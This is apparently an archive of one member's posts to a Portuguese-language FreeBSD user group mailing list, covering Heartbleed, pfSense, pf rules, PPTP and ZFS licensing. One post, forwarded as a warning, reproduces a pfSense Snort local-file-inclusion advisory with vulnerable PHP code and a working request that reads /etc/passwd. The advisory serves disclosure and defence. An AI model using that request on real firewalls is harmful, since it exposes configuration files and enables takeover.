 Já vi que em sistemas linux ninguém conseguiu de fato extrair a chave
 [1], no freeBSD a chave deve ficar na memória que vaza com o bug mais
 frequentemente =/


 [0] https://twitter.com/1njected/status/453781230593769472
 [1]
 http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html

 Peace;
 Fynn.



Fynn,

Pelo que li sobre esse teste feito pelo 1njected, assim que ele inicou o
serviço já fez o teste via ssltest.py, ou seja, não tinha muita coisa na
memória além da chave privada.

Eu acredito que se repetir o teste em qualquer outro SO com openssl
vulnerável nas mesmas condições ocorrerá o mesmo problema.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug]

[Welkson Renny de Medeiros]

Em 10 de abril de 2014 13:36, Welkson Renny de Medeiros
welk...@gmail.comescreveu:

 Em 10 de abril de 2014 12:57, Enrique Fynn enriquef...@gmail.comescreveu:

 Atenção especial aos servidores rodando FreeBSD, foram os únicos que
 um atacante conseguiu extrair a chave privada do ssl pelo bug. A fonte
 não é das mais confiáveis (Twitter) [0], mas não vejo razão para que
 não seja verdadeira.

 Já vi que em sistemas linux ninguém conseguiu de fato extrair a chave
 [1], no freeBSD a chave deve ficar na memória que vaza com o bug mais
 frequentemente =/


 [0] https://twitter.com/1njected/status/453781230593769472
 [1]
 http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html

 Peace;
 Fynn.





Aproveitando o gancho, lembrei do pfSense que usa HTTPS no WebGUI...

No fórum internacional do pfSense a galera está dizendo que várias versões
do pfSense estão vulneráveis... eu testei alguns usando esse site [1], e o
resultado me mostra o contrário.

Acredito que o openssl do pfSense apesar de ser um build vulnerável, foi
compilado sem heartbleed. Alguém confirma?

[1] http://rehmann.co/projects/heartbeat/

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug]

[Welkson Renny de Medeiros]

2014-04-08 18:24 GMT-03:00 Renato Botelho rbga...@gmail.com:

  Forwarded Message 
 From: FreeBSD Security Officer security-offi...@freebsd.org
 Reply-to: freebsd-secur...@freebsd.org
 To: FreeBSD Security Advisories security-advisor...@freebsd.org
 Subject: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug
 Date: Tue, 8 Apr 2014 20:42:29 GMT

 Hi,

 This is a heads-up for the OpenSSL Heartbleed bug.

 FreeBSD port security/openssl have been patched on 2014-04-07 21:46:40
 UTC (head, r350548) and 2014-04-07 21:48:07 UTC (branches/2014Q2, r350549).

 FreeBSD base system have been patched on 2014-04-08 18:27:32 UTC (head,
 r264265), 2014-04-08 18:27:39 UTC (stable/10, r264266), 2014-04-08
 18:27:46 UTC (releng/10.0, r264267).  The update is available with
 freebsd-update.  All other supported FreeBSD branches are not affected
 by this issue.



Quando vi o anúncio dessa falha não dei a devida importância, mas ontem já
deu para perceber o tamanho do estrago. Conseguiram capturar diversas
senhas de usuários do Yahoo, etc.

Estava conferindo a versão do OpenSSL no meu sistema:

% openssl version -v

OpenSSL 0.9.8x 10 May 2012

De acordo com esse site [1] não está vulnerável (mas é bem antiga, talvez
tenha outras falhas, não sei).

Nesse site [2] tem explicações referente a falha, e nesse [3] e esse [4]
explica o bug no código.

Para testar se seu site está vulnerável temos esses: [5] [6] [7]

Aparentemente o SSH não é vulnerável [8]

[1] http://beta.slashdot.org/story/200451

[2] http://heartbleed.com/

[3]
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html?m=1

[4]
http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html

[5] http://possible.lv/tools/hb/

[6] http://filippo.io/Heartbleed/

[7] http://rehmann.co/projects/heartbeat/

[8]

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug]

[Welkson Renny de Medeiros]

Em 9 de abril de 2014 09:04, Welkson Renny de Medeiros
welk...@gmail.comescreveu:

 2014-04-08 18:24 GMT-03:00 Renato Botelho rbga...@gmail.com:

  Forwarded Message 
 From: FreeBSD Security Officer security-offi...@freebsd.org
 Reply-to: freebsd-secur...@freebsd.org
 To: FreeBSD Security Advisories security-advisor...@freebsd.org
 Subject: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug
 Date: Tue, 8 Apr 2014 20:42:29 GMT

 Hi,

 This is a heads-up for the OpenSSL Heartbleed bug.

 FreeBSD port security/openssl have been patched on 2014-04-07 21:46:40
 UTC (head, r350548) and 2014-04-07 21:48:07 UTC (branches/2014Q2,
 r350549).

 FreeBSD base system have been patched on 2014-04-08 18:27:32 UTC (head,
 r264265), 2014-04-08 18:27:39 UTC (stable/10, r264266), 2014-04-08
 18:27:46 UTC (releng/10.0, r264267).  The update is available with
 freebsd-update.  All other supported FreeBSD branches are not affected
 by this issue.



 Quando vi o anúncio dessa falha não dei a devida importância, mas ontem já
 deu para perceber o tamanho do estrago. Conseguiram capturar diversas
 senhas de usuários do Yahoo, etc.

 Estava conferindo a versão do OpenSSL no meu sistema:

 % openssl version -v

 OpenSSL 0.9.8x 10 May 2012

 De acordo com esse site [1] não está vulnerável (mas é bem antiga, talvez
 tenha outras falhas, não sei).

 Nesse site [2] tem explicações referente a falha, e nesse [3] e esse [4]
 explica o bug no código.

 Para testar se seu site está vulnerável temos esses: [5] [6] [7]

 Aparentemente o SSH não é vulnerável [8]

 [1] http://beta.slashdot.org/story/200451

 [2] http://heartbleed.com/

 [3]
 http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html?m=1

 [4]
 http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html

 [5] http://possible.lv/tools/hb/

 [6] http://filippo.io/Heartbleed/

 [7] http://rehmann.co/projects/heartbeat/

 [8]

 Welkson



Esqueci do [8] http://undeadly.org/cgi?action=articlesid=20140408063423

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Tutorial instalação FreeBSD 10 - bem básico

[Welkson Renny de Medeiros]

Em 9 de abril de 2014 11:21, Eduardo Schoedler lis...@esds.com.brescreveu:

 Correção: resolveram o problema do PF com SMP no OpenBSD?
  Resposta:

 Will multiple processors help?
 PF will only use one processor, so multiple processors (or multiple cores)
 WILL NOT improve PF performance.

 Portanto, cuidado para que você for usá-lo.

 [1] http://www.openbsd.dk/faq/pf/perf.html


 --
 Eduardo Schoedler



Quase que cometo o pecado de perguntar sem antes procurar no Google rsrsrs:
http://lists.freebsd.org/pipermail/freebsd-pf/2012-June/006643.html

Aparentemente no FreeBSD já foi implementado, certo?

Pelo que vi, estará no current do FreeBSD10:
https://wiki.freebsd.org/WhatsNew/FreeBSD10

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] OFF dúvida phpPgAdmin (recovery password)

[Welkson Renny de Medeiros]

2014-02-18 14:00 GMT-03:00 Denis Granato denisgran...@gmail.com:

 Boa tarde a todos,

 Esqueci a senha do phpPgAdmin para gerenciar meu banco postgresql.
 Como posso recuperar?

 Obrigado



A senha na verdade não fica no PGAdmin, e sim no próprio Postgres. Se tiver
acesso ao servidor do banco basta modificar o pg_hba.conf colocando a
conexão em modo trust, e em seguida resetar a senha usando psql como
mostrado abaixo:
http://scratching.psybermonkey.net/2009/06/postgresql-how-to-reset-user-name.html

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Phpvirtualbox

[Welkson Renny de Medeiros]

Em 13 de fevereiro de 2014 09:04, Cleber Medina
clebermed...@gmail.comescreveu:

 Em 13/02/2014 09:33, Otavio Augusto escreveu:
  Qual mensagem de erro nos logs do apache ?
 
  Em 11 de fevereiro de 2014 22:12, Cleber Medina
  clebermed...@gmail.com escreveu:
  Hoje instalei o phpvirtualbox via ports no 10...
  Fiz os ajustes de usuário apache etc...mas não exibe a interface web
 
  Alguem tem alguma dica
  Tb não achei o  binario VboxManager nessa versão..
 
  Obrigado


Bem estranho, geralmente quando ocorre esses problemas de página em
branco é registrado uma mensagem de erro em:
tail -f /var/log/httpd-error.log

Tenta colocar um E_ALL no error_reporting (veja também display_errors e
display_startup_errors no seu php.ini  (/usr/local/etc/php.ini).

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)

[Welkson Renny de Medeiros]

Senhores, boa tarde!

Alerta pra quem usa o package Snort no pfSense.

Welkson

...

##
#  _ ___  _   _    _  _
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| | / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_\___/|_| \_|\|\/_/   \_\_|
#
# Exploit Title: pfSense 2.1 Privilege Escalation from less privileged
users (LFI/RCE)
# Date: 25/01/2014 (0-day)
# Exploit Author: @u0x (Pichaya Morimoto)
# Software Link: www.pfsense.org
# Category: Local File Inclusion (LFI)  Privilege Escalation
# Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
#
#



pfSense firewall/router distribution description :

==

pfSense is a free, open source customized distribution of FreeBSD tailored
for use as a firewall and router. In addition to being a powerful, flexible
firewalling and routing platform, it includes a long list of related
features and a package system allowing further expandability without adding
bloat and potential security vulnerabilities to the base distribution.
pfSense is a popular project with more than 1 million downloads since its
inception, and proven in countless installations ranging from small home
networks protecting a PC and an Xbox to large corporations, universities
and other organizations protecting thousands of network devices.

This project started in 2004 as a fork of the m0n0wall project, but focused
towards full PC installations rather than the embedded hardware focus of
m0n0wall. pfSense also offers an embedded image for Compact Flash based
installations, however it is not our primary focus.

Attack Scenario

==

Authenticated users with only permission to access some packages in web gui
(a.k.a. webConfigurator) will be able to escalate themselves to other
privileged admin by reading /conf/config.xml file through bugs (i.e. Snort
LFI), result in fully compromise the pfSense.

This attack abuse the user privilege scheme with some of official packages
(System  Package Manager)

* Session Hijacking also possible to steal less privileged user sessions to
perform this trick  due to http admin by default webConfigurator.

Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion
Vulnerability

Vulnerable file:

==

snort_log_view.php

[+] Checksum
SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
MD5: cd767e46a4e9e09ede7fd26560e37f14

Vulnerable Source Code :
==
http://www.pfsense.com/packages/config/snort/snort_log_view.php
https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php

...(deducted)...

$contents = '';
// Read the contents of the argument passed to us.
// Is it a fully qualified path and file?

if (file_exists($_GET['logfile']))
   $contents = file_get_contents($_GET['logfile']);
// It is not something we can display, so print an error.
else
   $contents = gettext(\n\nERROR -- File: {$_GET['logfile']} not
found!);
$pgtitle = array(gettext(Snort), gettext(Log File Viewer));
?

...(deducted)...
textarea style=width:100%; height:100%; readonly wrap=off rows=33
cols=80 name=code2?=$contents;?/textarea
...(deducted)...



Proof of Concept 1 : Arbitrary File Inclusion
==

GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083

HTTP/1.1 200 OK
Expires: Mon, 27 Jan 2014 07:25:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=18
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-type: text/html
Transfer-Encoding: chunked
Date: Sat, 25 Jan 2014 05:25:10 GMT
Server: lighttpd/1.4.32

...(deducted)...
td colspan=2 valign=top class=label
   div style=background: #ee; width:100%; height:100%;
id=textareaitem!-- NOTE: The opening *and* the closing textarea tag
must be on the same line. --
   textarea style=width:100%; height:100%; readonly wrap=off
rows=33 cols=80 name=code2root:*:0:0:Charlie :/root:/bin/sh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System :/:/usr/sbin/nologin
...(deducted)...
havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin

Re: [FUG-BR] Bloqueio 443 apenas alguns sites.

[Welkson Renny de Medeiros]

Em 20 de janeiro de 2014 14:14, Anker Projeto projetoan...@gmail.comescreveu:

 Boa tarde pessoal, hoje tenho rodando squid e estou tendo problemas com o
 HTTPS, quero bloquear alguns sites com https exceto alguns. uso o pf e
 estou tentando algo desse jeito , alguém pode me ajudar ?

 block in log on $IF_LAN proto {tcp, udp} from $REDE_LAN to port 443
 !BANCOS


 dentro da tabela bancos eu coloqueis os ips dos bancos .
 Obrigado



Anker, bom dia!

Não tenho como testar agora, mas acredito que seria algo assim:
block in log on $IF_LAN proto tcp from $REDE_LAN to !BANCOS port 443

 Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] ip de um dominio

[Welkson Renny de Medeiros]

Em 20 de janeiro de 2014 13:17, Renato Botelho rbga...@gmail.com escreveu:

 On 20-01-2014 13:33, Cleber Medina wrote:
  Boa tarde,
 
  Qual é a url daquele site que mostra todos os ips referentes a um
 dominio?

 Eu não sei qual a URL que você tá falando, mas vou te falar o que eu
 faço quando quero descobrir o range de IPs de um determinado site.



Ele deve está se referindo a esse:
http://bgp.he.net/

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [FreeBSD-Announce] FreeBSD 10.0-RELEASE Now Available

[Welkson Renny de Medeiros]

2014/1/20 Luiz Gustavo S. Costa luizgust...@luizgustavo.pro.br

 Uia ... que noticia boa !


 -- Forwarded message --
 From: Glen Barber g...@freebsd.org
 Date: 2014/1/20



Instalar em uma VM pra aprender a usar esse tal pkg =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] PPTP + PFSence

[Welkson Renny de Medeiros]

Em 17 de janeiro de 2014 10:16, Lucas Martinez corumb...@gmail.comescreveu:

 Leo, obrigado !

 Segui seu material deixei tudo Any e á mesma coisa.

 Enable PPTP server , configurei as regras no pfsence

 Tambem acompanhei esse material:

 http://www.vivaolinux.com.br/artigo/Criando-VPN-com-o-PFSense?pagina=1verifiquei
 em mais 2 materiais ( tudo padrão )



O problema do PPTP é o GRE (protocolo 47), alguns provedores bloqueiam...
alguns roteadores não conseguem repassar o pacote, etc. Viu algo referente
a isso?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] PPTP + PFSence

[Welkson Renny de Medeiros]

Em 17 de janeiro de 2014 13:39, Welkson Renny de Medeiros welk...@gmail.com
 escreveu:

 A questão é que seu provedor do 3G pode ter roteado certinho o GRE 47, já
 o link ligado ao pfSense não.

 Enfim, precisaria de mais informações, screenshots das regras do firewall,
 detalhes da configuração de rede (qual tipo de WAN é utilizada no pfSense,
 se o link é ligado diretamente ao pfSense ou se passa por um roteador
 antes, etc.).

 Mais alguns links:
 https://doc.pfsense.org/index.php/PPTP_VPN
 https://doc.pfsense.org/index.php/GRE_Interfaces
 https://doc.pfsense.org/index.php/PPTP_VPN

 Welkson


Último link foi igual, o correto seria esse:
http://devwiki.pfsense.org/PPTPTroubleShooting

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] PPTP + PFSence

[Welkson Renny de Medeiros]

Em 17 de janeiro de 2014 10:27, Lucas Martinez corumb...@gmail.comescreveu:

 Questão é se conectar diretamente no notebook , Conecta.

 No pfsence está tudo liberado de dentro para fora, apenas
 o pptp não funciona.



A questão é que seu provedor do 3G pode ter roteado certinho o GRE 47, já o
link ligado ao pfSense não.

Enfim, precisaria de mais informações, screenshots das regras do firewall,
detalhes da configuração de rede (qual tipo de WAN é utilizada no pfSense,
se o link é ligado diretamente ao pfSense ou se passa por um roteador
antes, etc.).

Mais alguns links:
https://doc.pfsense.org/index.php/PPTP_VPN
https://doc.pfsense.org/index.php/GRE_Interfaces
https://doc.pfsense.org/index.php/PPTP_VPN

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] FreeBSD 10.0 RC3 disponível para download

[Welkson Renny de Medeiros]

Em 27 de dezembro de 2013 10:11, Marcelo Gondim gon...@bsdinfo.com.brescreveu:

 Existe uma lenda urbana que diz que as versões pares são sempre as
 melhores hehehehe
 Até agora eu não tenho o que reclamar.

 []'s
 Gondim



Ouvi falar dessa lenda na época do Delphi... as versões ímpares sempre eram
boas... as pares, só dor de cabeça =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] [FYI] FreeBSD no Google Cloud Plataform (GCE)

[Welkson Renny de Medeiros]

Ótima notícia:
http://googlecloudplatform.blogspot.com.br/2013/12/google-compute-engine-is-now-generally-available.html

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] É verdade que ninguém tentou desenvolver um sistema operacional livre na década de 1980, exceto o Projeto GNU e (mais tarde) Berkeley CSRG, que havia sido solicitado especificamente pelo

[Welkson Renny de Medeiros]

Em 9 de dezembro de 2013 15:11, João Mancy joao...@gmail.com escreveu:

 Tártaro dois é a divisão binária de Tártaro Um , que veio do Jorge ???

 Interessante seu ciclo reprodutor, uma espécie de downgrade das Amebas.



Jorge ataca novamente =)

Não alimente trolls galera.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] FreeBSD on amazon aws - existe a opção ?

[Welkson Renny de Medeiros]

Em 18 de novembro de 2013 09:46, Leonardo Augusto lalin...@gmail.comescreveu:

 Pessoal,

 Alguém já conseguiu ou sabe se é possível utilizar freebsd nos
 serviços da amazon ?
 Vi um site com um monte de imagens de freebsd, mas no painel da conta
 de um amigo no aws,
 só tem opções de linux.

 []'s



Bom dia.

Colin Percival mantém essas imagens do BSD. Pelo que sei funcionam
perfeitamente (o tarsnap usa BSD na Amazon), mas não são suportadas
oficialmente pela Amazon.

https://aws.amazon.com/marketplace/pp/B00AA25MLK/
http://www.daemonology.net/freebsd-on-ec2/

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Certificado SSL no SQUID

[Welkson Renny de Medeiros]

Em 30 de outubro de 2013 09:30, Marcus Vinicius. surfi...@gmail.comescreveu:

 Isso mesmo, Neerlan.

 Em 30 de outubro de 2013 10:24, Neerlan Amorim neer...@gmail.com
 escreveu:
  http://wiki.squid-cache.org/Features/SslBump
 
  Squid-in-the-middle decryption and encryption of straight CONNECT and
  transparently redirected SSL traffic, using configurable CA
  certificates. While decrypted, the traffic can be analyzed, blocked,
  or adapted using regular Squid features such as ICAP and eCAP.
 
  É o que eu estou pensando?
  Possibilidade de fazer cache desse conteúdo?



No meu caso nem me preocupo tanto com o cache, e sim com a possibilidade de
bloquear tráfego https usando proxy transparente.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS

[Welkson Renny de Medeiros]

2013/9/17 Marcelo Gondim gon...@bsdinfo.com.br

 Em 17/09/13 21:33, Marcos Vinicios Silva dos Santos escreveu:
  Pergunta de Newbie: Será que haverá muita diferença do ZFS da Oracle
 para o
  OpenZFS? Será que vai ser possivel implementar todas as evoluções do ZFS
 da
  Oracle?



Ainda estou lendo o site, mas confesso que não encontrei nada sobre o
licenciamento.

Esse projeto seria um fork do ZFS ou reescrito do zero?

Se for um fork, a licença continuará CDDL ou será BSD?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS

[Welkson Renny de Medeiros]

Em 18 de setembro de 2013 08:30, Renato Botelho rbga...@gmail.comescreveu:

 De acordo com o site [1]:

 ZFS source code is copyright various contributors, and available under
 the CDDL open-source license.

 [1] http://www.open-zfs.org/wiki/About_OpenZFS

 []s
 --
 Renato Botelho



Garga,

Eu até vi esse link, mas como falava sobre ZFS e não sobre Open-ZFS pensei
que se tratava da versão da Oracle.

A licença continuando como CDDL não nos deixará da mesma forma na mão da
Oracle?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS

[Welkson Renny de Medeiros]

Em 18 de setembro de 2013 08:55, Renato Botelho rbga...@gmail.comescreveu:

 Eu não manjo muito de licenças, mas o que tem de errado com a licença CDDL?

 Eu acredito que deva ser um fork da última versão open source do ZFS da
 Sun/Oracle, então não tem como mudar a licença.

 --
 Renato Botelho



Eu também não...

Mas lembro que na época que portaram ZFS para BSD houve bastante discussão
quanto a isso.

Acredito que seja o mesmo problema que ocorre no Linux (incompatibilidade
de licenças):
http://arstechnica.com/information-technology/2010/06/uptake-of-native-linux-zfs-port-hampered-by-license-conflict/

Mas enfim, que venha pra somar.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [FreeBSD-Announce] Announcing OpenZFS

[Welkson Renny de Medeiros]

Em 18 de setembro de 2013 09:19, Antônio Pessoa atnpes...@gmail.comescreveu:

 Pelo que me lembre, ela é baseada na Mozilla Public License 1.1 e
  considerada incompatível com a GPL. Mas isso não chega a ser um
 problema, talvez apenas para o Linux.

 --
 Atenciosamente,

 Antônio Pessoa



Lendo mais um pouco encontrei esse link:
http://www.dirmgr.com/blog/2007/12/2/why-the-dislike-for-cddl.html

O primeiro comentário do link informa o seguinte:
This is not directed at you, more at the framers of the CDDL (and by
extension, the MPL). The CDDL/MPL are incompatible because the CDDL/MPL
require you to distribute the source *only* under the CDDL/MPL. This isn't
a problem when mixing code with other file-based licenses like BSD-alikes,
but means it doesn't play nice with entire-work licenses like the GPL
(either version). I'd like to see Sun update the CDDL to allow CDDL code to
be distributed under the terms of GPLv3, just like GPLv3 allows code under
it to be distributed as part of a larger work under the Affero GPL. *goes
and writes an email to webmink* 

Essa parte parece interessante:
This isn't a problem when mixing code with other file-based licenses like
BSD-alikes, but means it doesn't play nice with entire-work licenses like
the GPL (either version).

O texto completo da CDDL está aqui:
http://opensource.org/licenses/CDDL-1.0

Tem algumas coisas referente a patentes e propriedade intelectual, mas como
não manjo nada disso passo a bola para os expert`s de plantão.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] Lançamento do pfSense 2.1-RELEASE

[Welkson Renny de Medeiros]

Boas novas:
http://blog.pfsense.org/?p=712

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Hangout assunto FreeBSD

[Welkson Renny de Medeiros]

Em 29 de agosto de 2013 12:11, Luiz Gustavo S. Costa 
luizgust...@luizgustavo.pro.br escreveu:

 Olá pessoal,

 Eu estou querendo montar um Hangout semelhante ao modelo que eu utilizo
 para o Pfsense abordando algum assunto para FreeBSD.

 Ele terá um formato de tutorial, mas preciso conhecer a demanda.

 Inicialmente penso nos seguintes assuntos:

 - ZFS
 - Jail
 - Packet Filter / IPFW
 - build world  build kernel
 - 10-CURRENT

 O que acham ? se puderem opinar e/ou indicar outro assunto (claro, eu teria
 que avaliar o meu conhecimento em relação ao assunto proposto).

 No aguardo dos amigos.

 Abraços

 --
 Luiz Gustavo Costa (Powered by BSD)




ZFS avançado seria uma boa.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Sobre um site de críticas ao BSD

[Welkson Renny de Medeiros]

Em 22 de agosto de 2013 02:21, Marcelo Gondim gon...@bsdinfo.com.brescreveu:

 Nossa aquele Jorge Luis não pode ver esse blog não, senão a gente tá
 lascado HaHaHAhAhAhAh



Se o autor desse tópico não for Jorge Luis usando outro nome k
https://www.google.com.br/search?q=Johann+Peter+Dirichlet

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Sobre um site de críticas ao BSD

[Welkson Renny de Medeiros]

Em 22 de agosto de 2013 09:34, Sergio Augusto Vladisauskis 
sergi...@gmail.com escreveu:

 Linux is more portable then NetBSD aham...

 --
 Sergio Augusto Vladisauskis



PC-BSD is spyware, que tosco... só porque os caras usam bsdstats...
tempos atrás fizemos até uma campanha por aqui para que todos instalassem
para que o BR se destacasse no ranking mundial de uso do BSD.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [off-topic] Palestra sobre como é a estrutura do Facebook para suportar 1 bilhão de usuários

[Welkson Renny de Medeiros]

Em 20 de agosto de 2013 22:12, Leonardo Augusto lalin...@gmail.comescreveu:

 Tem no proprio site do face tudo que eles usam.

 google = facebook infra structure

 Achei muito ruim o video... a pagina que fala da infra da uma visão
 muito melhor.
 Lá fala que a salvação foi o memcache.. e o bigtable.. dentre outros...
 O hip-hop, compilador de php para C...
 Esses detalhes que permitem esse absurdo de read/write..

 Claro, ficaria melhor se fosse em cima do freebsd :) (é linux que eles
 usam ?)



Facebook usa BigTable? certeza?

BigTable é o NoSQL da Google.

Provavelmente eles usam Cassandra.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [1/2OFF] MacOS e compatibilidade binária com Linux

[Welkson Renny de Medeiros]

Em 14 de agosto de 2013 17:49, Pablo Sánchez phack...@gmail.com escreveu:

 Caros,

 Como todos sabem, o MacOS (Darwin) é oriundo do FreeBSD lá na versão
 3.0. Nessa época o Free já tinha compatibilidade binária com Linux,
 instalando o port linux_base. Até hoje isso funciona no FreeBSD de boa (e
 muitas vezes até com certo ganho de performance).

 A minha dúvida é: alguém sabe se tal compatibilidade binária foi mantida
 pela Apple? Basicamente é porque eu preciso executar uma ferramenta que só
 tem binário para Linux e Windows e não quero fazer isso usando VMs, acho um
 saco, além de pesado desnecessariamente.

 E então? Alguém? Hein? Hein?


MacOS usa Mach-O, e não ELF...

Fiz algumas pesquisas, talvez ajude:
http://osxbook.com/software/xbinary/

http://stackoverflow.com/questions/2574912/possiblity-of-loading-executing-elf-files-on-osx
http://stackoverflow.com/questions/9439436/is-a-linux-executable-compatible-with-os-x
http://unix.stackexchange.com/questions/7874/binary-compatibility-between-mac-os-x-and-linux

Apesar do Mac ser baseado em Darwin, aparentemente não tem a
compatibilidade binária com Linux como o FreeBSD tem. Foi o que entendi
lendo os links.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [1/2 OFF] PostgreSQL no FreeBSD ao invés de Linux

[Welkson Renny de Medeiros]

Em 9 de agosto de 2013 08:09, Juliano Atanazio juliano.l...@gmail.comescreveu:

 Em 8 de agosto de 2013 17:48, Danilo Egea daniloe...@yahoo.com.br
 escreveu:

 Então, Danilo.

 A intenção do meu post não foi somente em termos de performance que estou
 preocupado do PostgreSQL no FreeBSD, mas também saber
 o que o FreeBSD pode me oferecer de vantajoso para manter o PostgreSQL
 nele.



É um pouco antigo, mas talvez ajude:
http://freebsdfoundation.blogspot.com.br/2010/06/freebsd-and-postgresql.html

Realmente o ZFS faz uma diferença enorme (veja o primeiro gráfico e compare
com os demais):
http://www.unix-experience.fr/2013/2451/

Pelo que lembro alguns dos desenvolvedores do PG usam FreeBSD (não achei
referências, mas acho que já comentaram isso por aqui)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Current em produção

[Welkson Renny de Medeiros]

Em 9 de agosto de 2013 11:43, Marcelo Gondim gon...@bsdinfo.com.brescreveu:

 Opa Loos e pessoal,

 Valeu pela resposta mas a minha pergunta foi mais por curiosidade mesmo.
  :)
